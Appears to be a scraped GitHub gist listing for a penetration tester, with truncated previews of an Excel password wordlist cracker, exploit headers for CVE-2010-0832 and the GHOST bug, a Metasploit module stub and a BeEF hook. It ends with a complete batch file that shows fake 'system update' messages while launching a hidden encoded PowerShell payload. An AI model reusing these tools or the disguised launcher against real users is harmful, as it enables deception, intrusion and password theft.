Gabe Marshall gabemarshall

@gabemarshall
gabemarshall / excel.py
Created March 5, 2014 17:31
Cracking a password protected excel doc with python
import sys
import win32com.client
openedDoc = win32com.client.Dispatch("Excel.Application")
filename = sys.argv[1]
with open('wordlist.lst', 'r') as password_file:
    passwords = [item.rstrip('\n') for item in password_file]
gabemarshall / explain.sh
Last active August 29, 2015 14:05
Explainshell.com Bash Script (requires elinks)
#!/bin/bash
# If installing elinks via homebrew, install with `brew install elinks --devel`
MYURL="http://explainshell.com/explain?cmd="
count=0
for var in "$@"
do
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# Reference: http://www.pement.org/sed/sed1line.txt
-------------------------------------------------------------------------
USEFUL ONE-LINE SCRIPTS FOR SED (Unix stream editor) Dec. 29, 2005
Compiled by Eric Pement - pemente[at]northpark[dot]edu version 5.5
Latest version of this file (in English) is usually at:
http://sed.sourceforge.net/sed1line.txt
http://www.pement.org/sed/sed1line.txt
gabemarshall / osx-for-pentesting.sh
Last active March 27, 2024 02:56 — forked from matthewmueller/osx-for-hackers.sh
A fork of osx-for-hackers for my personal pentesting setup preferences
# OSX for Pentesting (Mavericks/Yosemite)
#
# A fork of OSX for Hackers (Original Source: https://gist.github.com/brandonb927/3195465)
#!/bin/sh
# Ask for the administrator password upfront
echo "Have you read through the script prior to running this? (y or n)"
read bcareful
gabemarshall / jquery.min.js
Created January 23, 2015 02:32
Minified Beef Hook
gabemarshall / ghost.c
Created January 27, 2015 17:20
Ghost PoC binary
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];

Keybase proof

I hereby claim:

  • I am gabemarshall on github.
  • I am tehskylark (https://keybase.io/tehskylark) on keybase.
  • I have a public key whose fingerprint is 154F E7AE 6BB1 3694 A23C DA7B A6E4 E466 86E5 5D54

To claim this, I am signing this object:

gabemarshall / http_proxysg.rb
Last active April 4, 2016 15:40
PoC for Bluecoat ProxySG Auth Challenge Vulnerability
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# A fork of http ntlm capture module
# ProxySG SA97
# https://bto.bluecoat.com/security-advisory/sa93
##
require 'msf/core'
gabemarshall / update.bat
Created April 29, 2015 14:25
batch file fake update
start cmd.exe @cmd /k "echo Installing system updates.. && timeout 3 >nul && echo Finalizing installation.. && timeout 3 >nul && echo Updates Complete! && timeout 1 >nul && taskkill /IM cmd.exe" & powershell -nop -win hidden -noni -enc <base64 encoded payload here>